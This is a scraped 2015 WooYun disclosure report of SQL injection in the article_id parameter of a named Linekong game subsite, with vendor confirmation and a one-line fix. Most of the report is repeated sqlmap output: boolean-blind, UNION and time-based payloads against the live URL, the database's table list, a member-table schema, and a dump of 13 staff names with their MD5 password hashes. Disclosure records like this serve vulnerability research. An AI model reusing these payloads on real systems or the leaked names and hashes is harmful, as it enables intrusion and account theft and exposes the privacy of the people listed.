蓝港某分站SQL注入漏洞 | wooyun-2015-0119298| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0119298

漏洞标题：蓝港某分站SQL注入漏洞

漏洞作者：路人甲

提交时间：2015-06-10 10:16

修复时间：2015-07-25 18:30

公开时间：2015-07-25 18:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-10：细节已通知厂商并且等待厂商处理中
2015-06-10：厂商已经确认，细节仅向厂商公开
2015-06-20：细节向核心白帽子及相关领域专家公开
2015-06-30：细节向普通白帽子公开
2015-07-10：细节向实习白帽子公开
2015-07-25：细节向公众公开

简要描述：

RT，不会是又要下线了吧^_^

详细说明：

SQL注入点

http://yt.linekong.com/special/festival/2009/51/news.php?article_id=10869

article_id参数存在sql注入

sqlmap identified the following injection points with a total of 94 HTTP(s) requests:
---
Parameter: article_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] yt_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
[85 tables]
+----------------------------------+
| jd_activity_0527_info            |
| jd_activity_0527_log             |
| jd_activity_certified_phone      |
| jd_activity_fanpai_card          |
| jd_activity_fanpai_log           |
| jd_activity_lover_binding_log    |
| jd_activity_lover_getkey_log     |
| jd_activity_newserver_log        |
| jd_activity_renzheng_log         |
| jd_activity_spread_log           |
| jd_activity_spread_playLog       |
| jd_activity_spread_receive       |
| jd_activity_spread_register      |
| jd_activity_spread_relationship  |
| jd_activity_spread_spreader      |
| jd_activity_tanabata_binding_log |
| jd_activity_tanabata_getkey_log  |
| jd_activity_tuiguang_child       |
| jd_activity_tuiguang_log         |
| jd_activity_tuiguang_parent      |
| jd_activity_whcltuiguang_child   |
| jd_activity_whcltuiguang_log     |
| jd_activity_whcltuiguang_parent  |
| jd_address                       |
| jd_article                       |
| jd_article_inserl                |
| jd_build                         |
| jd_cdkey_zzdjk                   |
| jd_cdkey_zzdjk_count             |
| jd_channel                       |
| jd_columns                       |
| jd_comment                       |
| jd_dcj_temp                      |
| jd_demo                          |
| jd_download                      |
| jd_editors_inserl                |
| jd_flash                         |
| jd_grading                       |
| jd_group                         |
| jd_image                         |
| jd_image_inserl                  |
| jd_lottery_20091201_cdkey        |
| jd_lottery_20091201_log          |
| jd_lottery_codekey               |
| jd_lottery_codekey_click_log     |
| jd_lottery_codekey_log           |
| jd_lottery_getItem               |
| jd_lottery_paytop                |
| jd_lottery_paytop_cdkey          |
| jd_member                        |
| jd_passportstat                  |
| jd_ploy_vote                     |
| jd_ploy_vote_cdkey               |
| jd_sort                          |
| jd_temp_belle_friend             |
| jd_temp_belle_user               |
| jd_temp_huapi                    |
| jd_temp_quiz                     |
| jd_temp_tong                     |
| jd_temp_torch_base               |
| jd_temp_torch_id                 |
| jd_temp_torch_rank               |
| jd_temp_torch_user               |
| jd_temp_torch_user_bak           |
| jd_temp_user815                  |
| jd_temp_wjdcwj                   |
| jd_tempprops                     |
| jd_tempprops_15                  |
| jd_tempprops_20091115            |
| jd_tempprops_20091216            |
| jd_tempprops_20100108            |
| jd_tempprops_2_res               |
| jd_tempprops_3                   |
| jd_tempprops_5                   |
| jd_tempprops_res                 |
| jd_types                         |
| jd_url                           |
| jd_url_inserl                    |
| jd_vote                          |
| jd_vote_inserl                   |
| jd_vote_option                   |
| jd_wj_article                    |
| jd_wj_article_inserl             |
| jd_wj_image                      |
| jd_wj_image_inserl               |
+----------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
Table: jd_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
Table: jd_member
[13 entries]
+-----------+----------------------------------+
| user_name | user_passwd                      |
+-----------+----------------------------------+
| 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| 韩旺楠       | bd95ee66e3ac8410d69a1d23e6e740ef |
| 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师   | de61d9913528e5cc7c0668ad72f53730 |
| 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| 王虎啸       | 848d91552903a10182ea65fab09f643e |
| 谢唐        | 50f17e827707336aaa425e7e3aaf4fdb |
| 焦赞        | dd305eab9b42cb3713d4f964ea53b642 |
| 崔春虎       | 64f5e67ed2b90b1bb9084c7e755bbd7b |
| 张晨        | 92a870e23eaac7b3c576e91b807f2a60 |
| 黄孟琪       | 471c75ee6643a10934502bdafee198fb |
| 高龙        | c98703aed69284552ffffea25a1706d9 |
| 陈维维       | 1702a132e769a623c1adb78353fc9503 |
+-----------+----------------------------------+

漏洞证明：

sqlmap identified the following injection points with a total of 94 HTTP(s) requests:
---
Parameter: article_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] yt_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
[85 tables]
+----------------------------------+
| jd_activity_0527_info            |
| jd_activity_0527_log             |
| jd_activity_certified_phone      |
| jd_activity_fanpai_card          |
| jd_activity_fanpai_log           |
| jd_activity_lover_binding_log    |
| jd_activity_lover_getkey_log     |
| jd_activity_newserver_log        |
| jd_activity_renzheng_log         |
| jd_activity_spread_log           |
| jd_activity_spread_playLog       |
| jd_activity_spread_receive       |
| jd_activity_spread_register      |
| jd_activity_spread_relationship  |
| jd_activity_spread_spreader      |
| jd_activity_tanabata_binding_log |
| jd_activity_tanabata_getkey_log  |
| jd_activity_tuiguang_child       |
| jd_activity_tuiguang_log         |
| jd_activity_tuiguang_parent      |
| jd_activity_whcltuiguang_child   |
| jd_activity_whcltuiguang_log     |
| jd_activity_whcltuiguang_parent  |
| jd_address                       |
| jd_article                       |
| jd_article_inserl                |
| jd_build                         |
| jd_cdkey_zzdjk                   |
| jd_cdkey_zzdjk_count             |
| jd_channel                       |
| jd_columns                       |
| jd_comment                       |
| jd_dcj_temp                      |
| jd_demo                          |
| jd_download                      |
| jd_editors_inserl                |
| jd_flash                         |
| jd_grading                       |
| jd_group                         |
| jd_image                         |
| jd_image_inserl                  |
| jd_lottery_20091201_cdkey        |
| jd_lottery_20091201_log          |
| jd_lottery_codekey               |
| jd_lottery_codekey_click_log     |
| jd_lottery_codekey_log           |
| jd_lottery_getItem               |
| jd_lottery_paytop                |
| jd_lottery_paytop_cdkey          |
| jd_member                        |
| jd_passportstat                  |
| jd_ploy_vote                     |
| jd_ploy_vote_cdkey               |
| jd_sort                          |
| jd_temp_belle_friend             |
| jd_temp_belle_user               |
| jd_temp_huapi                    |
| jd_temp_quiz                     |
| jd_temp_tong                     |
| jd_temp_torch_base               |
| jd_temp_torch_id                 |
| jd_temp_torch_rank               |
| jd_temp_torch_user               |
| jd_temp_torch_user_bak           |
| jd_temp_user815                  |
| jd_temp_wjdcwj                   |
| jd_tempprops                     |
| jd_tempprops_15                  |
| jd_tempprops_20091115            |
| jd_tempprops_20091216            |
| jd_tempprops_20100108            |
| jd_tempprops_2_res               |
| jd_tempprops_3                   |
| jd_tempprops_5                   |
| jd_tempprops_res                 |
| jd_types                         |
| jd_url                           |
| jd_url_inserl                    |
| jd_vote                          |
| jd_vote_inserl                   |
| jd_vote_option                   |
| jd_wj_article                    |
| jd_wj_article_inserl             |
| jd_wj_image                      |
| jd_wj_image_inserl               |
+----------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
Table: jd_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: article_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
Table: jd_member
[13 entries]
+-----------+----------------------------------+
| user_name | user_passwd                      |
+-----------+----------------------------------+
| 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| 韩旺楠       | bd95ee66e3ac8410d69a1d23e6e740ef |
| 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师   | de61d9913528e5cc7c0668ad72f53730 |
| 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| 王虎啸       | 848d91552903a10182ea65fab09f643e |
| 谢唐        | 50f17e827707336aaa425e7e3aaf4fdb |
| 焦赞        | dd305eab9b42cb3713d4f964ea53b642 |
| 崔春虎       | 64f5e67ed2b90b1bb9084c7e755bbd7b |
| 张晨        | 92a870e23eaac7b3c576e91b807f2a60 |
| 黄孟琪       | 471c75ee6643a10934502bdafee198fb |
| 高龙        | c98703aed69284552ffffea25a1706d9 |
| 陈维维       | 1702a132e769a623c1adb78353fc9503 |
+-----------+----------------------------------+

修复方案：

参数过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-06-10 18:28

厂商回复：

这个倚天没有下线，已提交开发人员，感谢指出的问题

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0119298

漏洞标题：蓝港某分站SQL注入漏洞

相关厂商：linekong.com

漏洞作者：路人甲

提交时间：2015-06-10 10:16

修复时间：2015-07-25 18:30

公开时间：2015-07-25 18:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0119298

漏洞标题：蓝港某分站SQL注入漏洞

相关厂商：linekong.com

漏洞作者： 路人甲

提交时间：2015-06-10 10:16

修复时间：2015-07-25 18:30

公开时间：2015-07-25 18:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0119298"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云